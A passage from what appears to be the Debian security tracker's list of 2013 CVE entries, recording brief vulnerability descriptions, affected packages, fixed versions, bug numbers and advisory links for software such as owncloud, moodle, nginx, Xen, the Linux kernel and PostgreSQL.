1.5.10.dfsg-1.1 and report bug CVE-2013-2086 [owncloud: oC-SA-2013-027] RESERVED - owncloud (Only owncloud 5.0.x) CVE-2013-2085 [owncloud: oC-SA-2013-020] RESERVED - owncloud (Only affects 5.0.x) CVE-2013-2084 RESERVED CVE-2013-2083 [Form filtering issue] RESERVED - moodle (low) [squeeze] - moodle (Minor issue) NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-38885 CVE-2013-2082 [Permission issue in blog comments] RESERVED - moodle NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-37245 CVE-2013-2081 [Information leak in hub registration] RESERVED - moodle (low) [squeeze] - moodle (Minor issue) NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-37822 CVE-2013-2080 [Potential information leak in Gradebook] RESERVED - moodle (low) [squeeze] - moodle (Minor issue) NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-37475 CVE-2013-2079 [Capability issue in Assignment] RESERVED - moodle (Only affects 2.3 and later) NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-38443 CVE-2013-2078 RESERVED CVE-2013-2077 RESERVED CVE-2013-2076 RESERVED CVE-2013-2075 RESERVED - chicken (bug #702410) NOTE: CVE assigned due to incomplete fix for CVE-2012-6122 TODO: check if whe have the incomplete fix already applied CVE-2013-2074 [prints passwords contained in HTTP URLs in error messages] RESERVED - kde4libs (low; bug #707776) [squeeze] - kde4libs (Minor issue) [wheezy] - kde4libs (Minor issue) NOTE: https://projects.kde.org/projects/kde/kdelibs/repository/revisions/65d736dab592bced4410ccfa4699de89f78c96ca/diff/kioslave/http/http.cpp CVE-2013-2073 RESERVED CVE-2013-2072 RESERVED - xen (low) CVE-2013-2071 [Information disclosure] RESERVED - tomcat7 7.0.40-1 (bug #707704) NOTE: https://issues.apache.org/bugzilla/show_bug.cgi?id=54178 CVE-2013-2070 [nginx proxy_pass buffer overflow] RESERVED - nginx 1.4.1-1 (bug #708164) [squeeze] - nginx (Vulnerable code not present) CVE-2013-2069 RESERVED CVE-2013-2068 RESERVED CVE-2013-2067 [Session fixation with FORM authenticator] RESERVED - tomcat7 7.0.33 - tomcat6 CVE-2013-2066 RESERVED CVE-2013-2065 RESERVED CVE-2013-2064 RESERVED CVE-2013-2063 RESERVED CVE-2013-2062 RESERVED CVE-2013-2061 [use of non-constant-time memcmp in HMAC comparison in openvpn_decrypt] RESERVED - openvpn 2.3.1-1 (low; bug #707329) [squeeze] - openvpn (Minor issue) [wheezy] - openvpn (Minor issue) NOTE: https://community.openvpn.net/openvpn/wiki/SecurityAnnouncement-f375aa67cc CVE-2013-2060 RESERVED NOT-FOR-US: OpenShift CVE-2013-2059 [Keystone: Deleted user can still create instances] RESERVED - keystone 2013.1.1-2 (bug #707598) [wheezy] - keystone (Minor issue) NOTE: http://lists.openstack.org/pipermail/openstack-announce/2013-May/000099.html CVE-2013-2058 [linux: chipidea: allow disabling streaming in host mode] RESERVED - linux-2.6 (Vulnerable code not present) - linux 3.8-1 [wheezy] - linux (Vulnerable code not present) NOTE: http://www.openwall.com/lists/oss-security/2013/05/03/2 CVE-2013-2057 RESERVED NOT-FOR-US: YaBB CVE-2013-2056 RESERVED CVE-2013-2055 RESERVED CVE-2013-2054 RESERVED CVE-2013-2053 RESERVED - openswan (low; bug #709144) TODO: check strongswan CVE-2013-2052 RESERVED CVE-2013-2051 RESERVED CVE-2013-2050 RESERVED CVE-2013-2049 RESERVED CVE-2013-2048 [owncloud: oC-SA-2013-025] RESERVED - owncloud (Only affects 5.0.x) CVE-2013-2047 [owncloud: oC-SA-2013-023] RESERVED - owncloud (Only 5.0.x) CVE-2013-2046 [owncloud: oC-SA-2013-019] RESERVED - owncloud (Only affects 4.5.x) CVE-2013-2045 [owncloud: oC-SA-2013-019] RESERVED - owncloud (Only affects 5.0.x) CVE-2013-2044 [owncloud: oC-SA-2013-022] RESERVED - owncloud (Only 5.0.x) CVE-2013-2043 [owncloud: oC-SA-2013-024] RESERVED - owncloud (Only 5.0.x and 4.5.x) CVE-2013-2042 [owncloud: oC-SA-2013-021] RESERVED - owncloud 4.0.15debian-1 CVE-2013-2041 [owncloud: oC-SA-2013-021] RESERVED - owncloud (Only affects 5.0.x) CVE-2013-2040 [owncloud: oC-SA-2013-021] RESERVED - owncloud 4.0.15debian-1 CVE-2013-2039 [owncloud: oC-SA-2013-020] RESERVED - owncloud 4.0.15debian-1 CVE-2013-2038 [DoS (packet parser crash) in the AIS driver when processing malformed packet] RESERVED - gpsd 3.6-5 (bug #706665) [wheezy] - gpsd (Minor issue) NOTE: http://lists.nongnu.org/archive/html/gpsd-dev/2013-05/msg00000.html CVE-2013-2037 [httplib2: SSL cert incorrect error handling] RESERVED - python-httplib2 (low; bug #706602) [squeeze] - python-httplib2 (Minor issue) [wheezy] - python-httplib2 (Minor issue) NOTE: http://openwall.com/lists/oss-security/2013/05/01/5 CVE-2013-2036 RESERVED CVE-2013-2035 RESERVED - hawtjni (bug #708293) CVE-2013-2034 [jenkins CSRF] RESERVED - jenkins (bug #706725) CVE-2013-2033 [jenkins XSS] RESERVED - jenkins (bug #706725) CVE-2013-2032 [Extensions can't fully block password changes] RESERVED - mediawiki 1:1.19.6-1 (bug #706601) NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=46590 CVE-2013-2031 [SVG JavaScript detection bypass] RESERVED - mediawiki 1:1.19.6-1 (bug #706601) NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=47304 CVE-2013-2030 [Nova uses insecure keystone middleware tmpdir by default] RESERVED - nova (Option not present in nova/2012.1.1) NOTE: http://lists.openstack.org/pipermail/openstack-announce/2013-May/000098.html CVE-2013-2029 RESERVED - nagios (Affected file nagios.upgrade_to_v3.sh not in Debian) NOTE: http://www.openwall.com/lists/oss-security/2013/04/30/8 CVE-2013-2028 [nginx http_transfer_encoding buffer overflow] RESERVED - nginx (Vulnerable code not present) CVE-2013-2027 RESERVED CVE-2013-2026 RESERVED CVE-2013-2025 RESERVED NOT-FOR-US: Ushahidi CVE-2013-2024 [OS command injection vulnerability in Chicken Scheme] RESERVED - chicken (bug #706525) NOTE: http://lists.nongnu.org/archive/html/chicken-announce/2013-04/msg00000.html CVE-2013-2023 RESERVED - jquery-jplayer 2.3.0-1 NOTE: used for jPlayer 2.2.23 XSS NOTE: http://www.openwall.com/lists/oss-security/2013/05/05/3 TODO: check if 2.1.0-2 already fixed this issue CVE-2013-2022 RESERVED - jquery-jplayer 2.1.0-2 NOTE: https://github.com/happyworm/jPlayer/commit/c5fe17bb4459164bd59153b57248cf94b8867373 NOTE: used for jPlayer 2.2.20 XSS NOTE: http://www.openwall.com/lists/oss-security/2013/05/05/3 CVE-2013-2021 (pdf.c in ClamAV 0.97.1 through 0.97.7 allows remote attackers to cause ...) - clamav 0.97.8+dfsg-1 CVE-2013-2020 (Integer underflow in the cli_scanpe function in pe.c in ClamAV before ...) - clamav 0.97.8+dfsg-1 CVE-2013-2019 [stack overflow vulnerabilities in the XML parser] RESERVED - boinc 6.13.6+dfsg-1 NOTE: http://boinc.berkeley.edu/gitweb/?p=boinc-v2.git;a=commitdiff;h=9a4140ae30a72e5175f3f31646d91f2d58df7156 CVE-2013-2018 [SQL injections in the server-side scheduler code] RESERVED - boinc 7.0.65+dfsg-1 (low) [squeeze] - boinc (Vulnerable code not present) [wheezy] - boinc (Minor issue) NOTE: server-maker not shipped in squeeze CVE-2013-2017 (The veth (aka virtual Ethernet) driver in the Linux kernel before ...) - linux 2.6.34-1 - linux-2.6 2.6.34-1 [squeeze] - linux-2.6 (Introduced in 2.6.33) NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6ec82562ffc6f297d0de36d65776cff8e5704867 NOTE: http://marc.info/?l=linux-netdev&m=127310770900442&w=3 CVE-2013-2016 [qemu: virtio: out-of-bounds config space access] RESERVED - qemu - qemu-kvm NOTE: https://lists.gnu.org/archive/html/qemu-devel/2013-04/msg05013.html NOTE: https://lists.gnu.org/archive/html/qemu-devel/2013-04/msg05254.html NOTE: http://marc.info/?l=oss-security&m=136722323931507&w=2 NOTE: Only pratically affects virtio-rng according to oss-reference (and if mmap_min_addr = 0) TODO: check CVE-2013-2015 (The ext4_orphan_del function in fs/ext4/namei.c in the Linux kernel ...) {DSA-2669-1 DSA-2668-1} - linux 3.8-1 (low) - linux-2.6 (low) CVE-2013-2014 [no limitation for requests and headers size which can cause a crash] RESERVED - keystone (bug #708515) NOTE: fixed in 2013.1-1 for experimental CVE-2013-2013 [OpenStack keystone password disclosure on command line] RESERVED - python-keystoneclient NOTE: https://bugs.launchpad.net/python-keystoneclient/+bug/938315 TODO: check and report to BTS CVE-2013-2012 [autojump profile will load random stuff from a directory called custom_install] RESERVED - autojump (vulnerable code not present for unstable) NOTE: experimental affected as per 21.5.1-1, see #706252 NOTE: experimental fixed as 21.5.1-2 CVE-2013-2011 RESERVED NOT-FOR-US: WP Super Cache NOTE: this issue exists because of an incomplete fix for CVE-2013-2009 CVE-2013-2010 RESERVED NOT-FOR-US: W3 Total Cache CVE-2013-2009 RESERVED NOT-FOR-US: WP Super Cache CVE-2013-2008 RESERVED NOT-FOR-US: WP Super Cache CVE-2013-2007 RESERVED - qemu (qemu guest agent, only from version in experimental on) CVE-2013-2006 [OpenStack keystone LDAP password disclosure in log files] RESERVED - keystone NOTE: https://review.openstack.org/#/c/26826/2/keystone/common/config.py NOTE: https://bugs.launchpad.net/keystone/+bug/1172195 TODO: check CVE-2013-2005 RESERVED CVE-2013-2004 RESERVED CVE-2013-2003 RESERVED CVE-2013-2002 RESERVED CVE-2013-2001 RESERVED CVE-2013-2000 RESERVED CVE-2013-1999 RESERVED CVE-2013-1998 RESERVED CVE-2013-1997 RESERVED CVE-2013-1996 RESERVED CVE-2013-1995 RESERVED CVE-2013-1994 RESERVED CVE-2013-1993 RESERVED CVE-2013-1992 RESERVED CVE-2013-1991 RESERVED CVE-2013-1990 RESERVED CVE-2013-1989 RESERVED CVE-2013-1988 RESERVED CVE-2013-1987 RESERVED CVE-2013-1986 RESERVED CVE-2013-1985 RESERVED CVE-2013-1984 RESERVED CVE-2013-1983 RESERVED CVE-2013-1982 RESERVED CVE-2013-1981 RESERVED CVE-2013-1980 RESERVED - xmp 3.4.0-3 (low; bug #706667) [wheezy] - xmp (Minor issue) [squeeze] - xmp (Minor issue) CVE-2013-1979 (The scm_set_cred function in include/net/scm.h in the Linux kernel ...) {DSA-2669-1} - linux 3.8.11-1 - linux-2.6 (Introduced in 2.6.36) CVE-2013-1978 RESERVED CVE-2013-1977 RESERVED - keystone (permissions to /etc/keystone/keystone.conf restricted in postinst) NOTE: http://www.openwall.com/lists/oss-security/2013/04/19/2 CVE-2013-1976 RESERVED CVE-2013-1975 RESERVED CVE-2013-1974 RESERVED CVE-2013-1973 RESERVED NOT-FOR-US: Drupal contributed module CVE-2013-1972 RESERVED NOT-FOR-US: Drupal contributed module CVE-2013-1971 RESERVED NOT-FOR-US: Drupal contributed module CVE-2013-1970 REJECTED NOTE: rejected, erroneously assigned for libxml2 CVE-2013-1969 (Multiple use-after-free vulnerabilities in libxml2 2.9.0 and possibly ...) - libxml2 (Affecting only 2.9.x, see bug #705722) NOTE: https://git.gnome.org/browse/libxml2/commit/?id=de0cc20c29cb3f056062925395e0f68d2250a46f CVE-2013-1968 RESERVED CVE-2013-1967 [mediaelement flashmediaelement XSS] RESERVED - owncloud (Vulnerable code not present) NOTE: oC >= 4.5 only CVE-2013-1966 RESERVED CVE-2013-1965 RESERVED CVE-2013-1964 [grant table hypercall acquire/release imbalance] RESERVED {DSA-2666-1} - xen 4.1.4-3 NOTE: http://lists.xen.org/archives/html/xen-announce/2013-04/msg00006.html CVE-2013-1963 RESERVED - owncloud (Vulnerable code not present) NOTE: oC >= 4.5 only CVE-2013-1962 [DoS (max count of open files exhaustion) due sockets leak in the storage pool] RESERVED - libvirt (Vulnerable code not present) NOTE: http://libvirt.org/git/?p=libvirt.git;a=commitdiff;h=ca697e90d5bd6a6dfb94bfb6d4438bdf9a44b739 CVE-2013-1961 [libtiff-tools: Stack-based buffer overflow with malformed image-length and resolution] RESERVED - tiff (bug #706674) CVE-2013-1960 [libtiff-tools: Heap-based buffer overflow in t2_process_jpeg_strip] RESERVED - tiff (bug #706675) CVE-2013-1959 (kernel/user_namespace.c in the Linux kernel before 3.8.9 does not have ...) - linux 3.8.11-1 [wheezy] - linux (Introduced in 3.7) - linux-2.6 (Introduced in 3.7) CVE-2013-1958 (The scm_check_creds function in net/core/scm.c in the Linux kernel ...) - linux CVE-2013-1957 (The clone_mnt function in fs/namespace.c in the Linux kernel before ...) - linux CVE-2013-1956 (The create_user_ns function in kernel/user_namespace.c in the Linux ...) - linux 3.8.11-1 CVE-2013-1955 RESERVED NOT-FOR-US: Easy PHP Calendar CVE-2013-1954 [Buffer Overflow in ASF Demuxer] RESERVED - vlc 2.0.6-1 (bug #705136) NOTE: http://www.videolan.org/security/sa1302.html CVE-2013-1953 [stack-based buffer overflow in bmp parser] RESERVED - autotrace (low) - gimp 2.6.10-1 NOTE: Gimp was fixed earlier, but only Squeeze version was checked NOTE: In gimp code introduced with d9c6f88141aecf956c5d721168f795de0e3027b8 NOTE: and fixed with 57f805a159874107c6c98065f9aa648c3634b8fd NOTE: https://git.gnome.org/browse/gimp/commit/?h=d9c6f88141aecf956c5d7 NOTE: https://git.gnome.org/browse/gimp/commit/?h=57f805a159874107c6c98 CVE-2013-1952 (Xen 4.x, when using Intel VT-d for a bus mastering capable PCI device, ...) {DSA-2666-1} - xen 4.1.4-4 CVE-2013-1951 RESERVED - mediawiki 1:1.19.5-1 CVE-2013-1950 RESERVED - libtirpc (regression code not present) NOTE: Regression introduced with 82cc2e6129c872c8be09381055f2fb5641c5e6fe NOTE: Regression fixed with a9f437119d79a438cb12e510f3cadd4060102c9f NOTE: http://www.openwall.com/lists/oss-security/2013/04/22/9 CVE-2013-1949 (Social Media Widget (social-media-widget) plugin 4.0 for WordPress ...) NOT-FOR-US: Wordpress Social Media Widget CVE-2013-1948 (converter.rb in the md2pdf gem 0.0.1 for Ruby allows context-dependent ...) NOT-FOR-US: Ruby gem md2pdf CVE-2013-1947 (kelredd-pruview gem 0.3.8 for Ruby allows context-dependent attackers ...) NOT-FOR-US: Ruby Gem kelredd-pruview CVE-2013-1946 RESERVED NOT-FOR-US: RESTful Web Services (RESTWS) Drupal cotributed module CVE-2013-1945 RESERVED CVE-2013-1944 (The tailMatch function in cookie.c in cURL and libcurl before 7.30.0 ...) {DSA-2660-1} - curl 7.29.0-2.1 (bug #705274) [wheezy] - curl 7.26.0-1+wheezy2 NOTE: http://curl.haxx.se/docs/adv_20130412.html CVE-2013-1943 RESERVED CVE-2013-1942 [XSS vulnerability in jPlayer] RESERVED - owncloud (Depends on libjs-jquery-jplayer) - jquery-jplayer 2.1.0-2 NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-014/ NOTE: https://github.com/happyworm/jPlayer/commit/e8ca190f7f972a6a421cb95f09e138720e40ed6d CVE-2013-1941 [Postgre: Insecure database password generator] RESERVED - owncloud NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-015/ CVE-2013-1940 (X.Org X server before 1.13.4 and 1.4.x before 1.14.1 does not properly ...) {DSA-2661-1} - xorg-server 2:1.12.4-6 CVE-2013-1939 [Windows: Local file disclosure] RESERVED - owncloud (Windows version only) - php-sabredav (running in Windows hosts) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-016/ CVE-2013-1938 RESERVED NOT-FOR-US: Zimbra CVE-2013-1937 (Multiple cross-site scripting (XSS) vulnerabilities in ...) - phpmyadmin (Affected are versions 3.5.0 to 3.5.7, older versions not vulnerable) NOTE: http://seclists.org/fulldisclosure/2013/Apr/100 NOTE: https://github.com/phpmyadmin/phpmyadmin/commit/79089c9bc02c82c15419fd9d6496b8781ae08a5a CVE-2013-1936 RESERVED CVE-2013-1935 RESERVED CVE-2013-1934 [mantis: XSS issue on Configuration Report page when displaying complex value] RESERVED - mantis (low) [wheezy] - mantis (Minor issue) [squeeze] - mantis (Minor issue) TODO: File bug NOTE: http://www.openwall.com/lists/oss-security/2013/04/04/8 NOTE: http://www.mantisbt.org/bugs/view.php?id=15416 CVE-2013-1933 (The extract_from_ocr function in lib/docsplit/text_extractor.rb in the ...) NOT-FOR-US: Karteek Docsplit Ruby Gem CVE-2013-1932 [mantis: XSS vulnerability on Configuration Report page] RESERVED - mantis (affects Mantis 1.2.13 only) NOTE: http://www.openwall.com/lists/oss-security/2013/04/04/8 CVE-2013-1931 [mantis: XSS vulnerability when deleting a version] RESERVED - mantis (affects Mantis 1.2.14 only) NOTE: http://www.openwall.com/lists/oss-security/2013/04/04/8 CVE-2013-1930 [mantis: Close button available to users despite workflow restrictions] RESERVED - mantis (affects only Mantis 1.2.12 and later) NOTE: http://www.openwall.com/lists/oss-security/2013/04/04/8 CVE-2013-1929 [tg3 VPD firmware -> driver injection] RESERVED {DSA-2669-1 DSA-2668-1} - linux 3.8.11-1 - linux-2.6 CVE-2013-1928 (The do_video_set_spu_palette function in fs/compat_ioctl.c in the ...) {DSA-2668-1} - linux 3.2.35-1 - linux-2.6 CVE-2013-1927 (The IcedTea-Web plugin before 1.2.3 and 1.3.x before 1.3.2 allows ...) - icedtea-web 1.3.2-1 CVE-2013-1926 (The IcedTea-Web plugin before 1.2.3 and 1.3.x before 1.3.2 uses the ...) - icedtea-web 1.3.2-1 CVE-2013-1925 RESERVED NOT-FOR-US: CTools module for Drupal CVE-2013-1924 RESERVED NOT-FOR-US: Commerce Skrill Drupal module CVE-2013-1923 [rpc.gssd is vulnerable to DNS spoofing] RESERVED - nfs-utils 1:1.2.8-1 (low; bug #707401) [squeeze] - nfs-utils (Minor issue) [wheezy] - nfs-utils (Minor issue) CVE-2013-1922 (qemu-nbd in QEMU, as used in Xen 4.2.x, determines the format of a raw ...) - xen (qemu-nbd-xen built, but not installed into the binary packages) - qemu 1.5.0+dfsg-1 (low; bug #705544) [squeeze] - qemu (Minor issue) [wheezy] - qemu (Minor issue) - xen-qemu-dm-4.0 (qemu-nbd not installed by the binary package) CVE-2013-1921 RESERVED CVE-2013-1920 (Xen 4.2.x, 4.1.x, and earlier, when the hypervisor is running "under ...) - xen (XSM not enabled in build) NOTE: Debian package not build with XSM_ENABLE, thus resulted binary packages not affected CVE-2013-1919 (Xen 4.2.x and 4.1.x does not properly restrict access to IRQs, which ...) {DSA-2662-1} - xen 4.1.4-3 NOTE: http://lists.xen.org/archives/html/xen-announce/2013-04/msg00003.html CVE-2013-1918 (Certain page table manipulation operations in Xen 4.1.x, 4.2.x, and ...) {DSA-2666-1} - xen 4.1.4-4 CVE-2013-1917 (Xen 3.1 through 4.x, when running 64-bit hosts on Intel CPUs, does not ...) {DSA-2662-1} - xen 4.1.4-3 NOTE: http://lists.xen.org/archives/html/xen-announce/2013-04/msg00005.html CVE-2013-1916 RESERVED NOT-FOR-US: WordPress plugin CVE-2013-1915 (ModSecurity before 2.7.3 allows remote attackers to read arbitrary ...) {DSA-2659-1} - modsecurity-apache 2.6.6-6 (bug #704625) - libapache-mod-security NOTE: https://github.com/SpiderLabs/ModSecurity/commit/d4d80b38aa85eccb26e3c61b04d16e8ca5de76fe NOTE: http://marc.info/?l=oss-security&m=136499182131283&w=2 CVE-2013-1914 (Stack-based buffer overflow in the getaddrinfo function in ...) - eglibc 2.17-2 (bug #704623) CVE-2013-1913 RESERVED CVE-2013-1912 (Buffer overflow in HAProxy 1.4 through 1.4.22 and 1.5-dev through ...) - haproxy 1.4.23-1 (bug #704611) NOTE: http://git.1wt.eu/web?p=haproxy-1.4.git;a=commitdiff;h=dc80672211 CVE-2013-1911 (lib/ldoce/word.rb in the ldoce 0.0.2 gem for Ruby allows remote ...) NOT-FOR-US: ldoce ruby gem CVE-2013-1910 [Not removing bad metadata and using it in next run] RESERVED - yum (unimportant) NOTE: http://yum.baseurl.org/gitweb?p=yum.git;a=commitdiff;h=c148eb10b798270b3d15087433c8efb2a79a69d0 NOTE: Only used for bootstraps of chroots, see README.Debian CVE-2013-1909 RESERVED CVE-2013-1908 RESERVED CVE-2013-1907 RESERVED CVE-2013-1906 RESERVED CVE-2013-1905 RESERVED CVE-2013-1904 [roundcube variable overwrite] RESERVED - roundcube 0.7.2-9 [squeeze] - roundcube (Vulnerable code not present) CVE-2013-1903 (PostgreSQL, possibly 9.2.x before 9.2.4, 9.1.x before 9.1.9, 9.0.x ...) - postgresql-9.1 (installer related) - postgresql-8.4 (installer related) CVE-2013-1902 (PostgreSQL, 9.2.x before 9.2.4, 9.1.x before 9.1.9, 9.0.x before ...) - postgresql-9.1 (installer related) - postgresql-8.4 (installer related) CVE-2013-1901 (PostgreSQL 9.2.x before 9.2.4 and 9.1.x before 9.1.9 does not properly ...) {DSA-2658-1} - postgresql-9.1 9.1.9-1 CVE-2013-1900 (PostgreSQL 9.2.x before 9.2.4, 9.1.x before 9.1.9, 9.0.x before ...) {DSA-2658-1 DSA-2657-1} - postgresql-9.1 9.1.9-1 - postgresql-8.4 8.4.17-1 CVE-2013-1899 (Argument injection vulnerability in PostgreSQL 9.2.x before 9.2.4, ...) {DSA-2658-1} - postgresql-9.1 9.1.9-1 (bug #704479) CVE-2013-1898 (lib/thumbshooter.rb in the Thumbshooter 0.1.5 gem for Ruby allows ...) NOT-FOR-US: Ruby gem Thumbshooter CVE-2013-1897 (The do_search function in ldap/servers/slapd/search.c in 389 Directory ...) - 389-ds-base (bug #704421) NOTE: http://git.fedorahosted.org/cgit/389/ds.git/commit/?h=389-ds-base-1.2.11&id=5a18c828533a670e7143327893f8171a19062286 NOTE: https://fedorahosted.org/389/ticket/47308 CVE-2013-1896 RESERVED CVE-2013-1895 [concurrency issue leading to auth bypass] RESERVED - python-bcrypt (bug #704030) [squeeze] - python-bcrypt (thread support only introduced after 0.1 release) NOTE: https://code.google.com/p/py-bcrypt/source/detail?r=b03cc5246ea21a839fd027da5616d8d470247558 CVE-2013-1894 RESERVED CVE-2013-1893 RESERVED - owncloud (only affecting 5.0 branch) CVE-2013-1892 [mongodb: SSJI to RCE] RESERVED - mongodb 1:2.4.1-1 (bug #704042) [wheezy] - mongodb 1:2.0.6-1.1 NOTE: http://www.openwall.com/lists/oss-security/2013/03/25/7 CVE-2013-1891 RESERVED CVE-2013-1890 RESERVED - owncloud (only affecting 5.0 branch) CVE-2013-1889 RESERVED - libapache2-mod-ruid2 0.9.8-1 (low; bug #704066) [wheezy] - libapache2-mod-ruid2 (Minor issue) NOTE: Fix: https://github.com/mind04/mod-ruid2/commit/1fed9dda70cd44d54301df19730a29ae0989e0a2 CVE-2013-1888 [Insecure temporary directory handling /tmp/pip-build] RESERVED - python-pip [squeeze] - python-pip NOTE: https://github.com/pypa/pip/pull/780/files CVE-2013-1887 (Multiple cross-site scripting (XSS) vulnerabilities in the Views ...) - drupal6 (only affects 7.x-3.x to 7.x-3.6) - drupal7 (views module not packaged) CVE-2013-1886 RESERVED CVE-2013-1885 RESERVED CVE-2013-1884 (The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through ...) - subversion 1.7.9-1 (bug #704940) [wheezy] - subversion (Subversion HTTPD servers 1.7.0 through 1.7.8 (inclusive)) [squeeze] - subversion (Subversion HTTPD servers 1.7.0 through 1.7.8 (inclusive)) NOTE: http://bugs.debian.org/704940#32 NOTE: http://subversion.apache.org/security/CVE-2013-1884-advisory.txt CVE-2013-1883 [mantis: remote DoS] RESERVED - mantis (only affects 1.2.12 to 1.2.14) NOTE: http://www.openwall.com/lists/oss-security/2013/03/21/3 CVE-2013-1882 RESERVED CVE-2013-1881 RESERVED CVE-2013-1880 [XSS vulnerability in portfolioPublish demo application] RESERVED - activemq (portfolio demo app not shipped in Debian package) NOTE: https://issues.apache.org/jira/browse/AMQ-4398 CVE-2013-1879 [XSS vulnerability in scheduled.jsp] RESERVED - activemq (scheduler not shipped in Debian package) NOTE: https://issues.apache.org/jira/browse/AMQ-4397 CVE-2013-1878 REJECTED CVE-2013-1877 REJECTED CVE-2013-1876 REJECTED CVE-2013-1875 (command_wrap.rb in the command_wrap Gem for Ruby allows remote ...) NOT-FOR-US: ruby gem command_wrap CVE-2013-1874 [Chicken Scheme: code execution] RESERVED - chicken (low; bug #702410) [squeeze] - chicken (Minor issue) [wheezy] - chicken (Minor issue) NOTE: http://www.openwall.com/lists/oss-security/2013/03/19/11 CVE-2013-1873 [linux kernel kernel stack memory disclosure] REJECTED CVE-2013-1872 RESERVED CVE-2013-1871 RESERVED CVE-2013-1870 RESERVED CVE-2013-1869 RESERVED CVE-2013-1868 [VLC Buffer overflows] RESERVED - vlc 2.0.5-1 NOTE: http://www.videolan.org/security/sa1301.html CVE-2013-1867 RESERVED CVE-2013-1866 RESERVED CVE-2013-1865 (OpenStack Keystone Folsom (2012.2) does not properly perform ...) - keystone (only affects folsom) NOTE: fixed in experimental with keystone/2012.2.3-2 CVE-2013-1864 [Ekiga billion laughs flaw in ptlib] RESERVED NOTE: http://www.openwall.com/lists/oss-security/2013/03/15/6 - ekiga (bug #704133) CVE-2013-1863 (Samba 4.x before 4.0.4, when configured as an Active Directory domain ...) - samba4 (Debian package only uses ntvfs, see #679678) NOTE: http://www.samba.org/samba/history/samba-4.0.4.html NOTE: http://www.samba.org/samba/security/CVE-2013-1863 CVE-2013-1862 RESERVED - apache2 (unimportant) NOTE: Such injection issues are not treated as security issues CVE-2013-1861 (MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, ...) - mysql-5.5 (bug #706715) - mysql-5.1 [squeeze] - mysql-5.1 (bug #706715) NOTE: https://mariadb.atlassian.net/browse/MDEV-4252 CVE-2013-1860 (Heap-based buffer overflow in the wdm_in_callback function in ...) {DSA-2668-1} - linux 3.2.41-1 - linux-2.6 CVE-2013-1859 (The Node Parameter Control module 6.x-1.x for Drupal does not properly ...) NOT-FOR-US: Drupal module Node Parameter Control CVE-2013-1858 (The clone system-call implementation in the Linux kernel before 3.8.3 ...) - linux (Only exploitable starting with 3.7) - linux-2.6 (Only exploitable starting with 3.7) NOTE: http://stealth.openwall.net/xSports/clown-newuser.c CVE-2013-1857 (The sanitize helper in ...) {DSA-2655-1} - ruby-actionpack-3.2 3.2.6-6 (bug #703349) - ruby-actionpack-2.3 2.3.14-5 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-1856 (The ActiveSupport::XmlMini_JDOM backend in ...) - ruby-activesupport-2.3 (Only affects 3.x and later) - ruby-activesupport-3.2 3.2.6-6 (bug #703350) - rails (Only affects 3.x and later) NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-1855 (The sanitize_css method in ...) {DSA-2655-1} - ruby-actionpack-3.2 3.2.6-6 (bug #703349) - ruby-actionpack-2.3 2.3.14-5 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-1854 (The Active Record component in Ruby on Rails 2.3.x before 2.3.18, ...) {DSA-2655-1} - ruby-activerecord-3.2 3.2.6-5 (bug #703348) - ruby-activerecord-2.3 2.3.14-6 - ruby-activesupport-2.3 2.3.14-7 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-1853 [Almanah doesn't encrypt the database] RESERVED - almanah 0.9.1-1 (bug #702905) [squeeze] - almanah (Only affect Almanah used in combination with glib 2.32) NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=695117 CVE-2013-1852 RESERVED CVE-2013-1851 [user_migrate: Local file disclosure] RESERVED - owncloud 4.0.8debian-1.6 (bug #703094) NOTE: https://owncloud.org/about/security/advisories/oC-SA-2013-010/ NOTE: http://www.openwall.com/lists/oss-security/2013/03/14/8 CVE-2013-1850 [Contacts: Bypass of file blacklist] RESERVED - owncloud 4.0.8debian-1.6 (bug #703094) NOTE: https://owncloud.org/about/security/advisories/oC-SA-2013-009/ NOTE: http://www.openwall.com/lists/oss-security/2013/03/14/8 CVE-2013-1849 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through ...) - subversion 1.7.9-1 (bug #704940) [wheezy] - subversion 1.6.17dfsg-4+deb7u2 NOTE: http://seclists.org/fulldisclosure/2013/Mar/56 CVE-2013-1848 (fs/ext3/super.c in the Linux kernel before 3.8.4 uses incorrect ...) - linux 3.2.41-1 - linux-2.6 [squeeze] - linux-2.6 (Introduced in 2.6.33) NOTE: http://www.openwall.com/lists/oss-security/2013/03/20/8 CVE-2013-1847 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through ...) - subversion 1.7.9-1 (bug #704940) [wheezy] - subversion 1.6.17dfsg-4+deb7u2 NOTE: http://subversion.apache.org/security/CVE-2013-1847-advisory.txt CVE-2013-1846 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before ...) - subversion 1.7.9-1 (bug #704940) [wheezy] - subversion 1.6.17dfsg-4+deb7u2 NOTE: http://subversion.apache.org/security/CVE-2013-1846-advisory.txt CVE-2013-1845 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before ...) - subversion 1.7.9-1 (bug #704940) [wheezy] - subversion 1.6.17dfsg-4+deb7u2 NOTE: http://subversion.apache.org/security/CVE-2013-1845-advisory.txt CVE-2013-1844 (Cross-site scripting (XSS) vulnerability in Piwik before 1.11 allows ...) - piwik (bug #506933) CVE-2013-1843 (Open redirect vulnerability in the Access tracking mechanism in TYPO3 ...) {DSA-2646-1} - typo3-src 4.5.19+dfsg1-5 (bug #702574) CVE-2013-1842 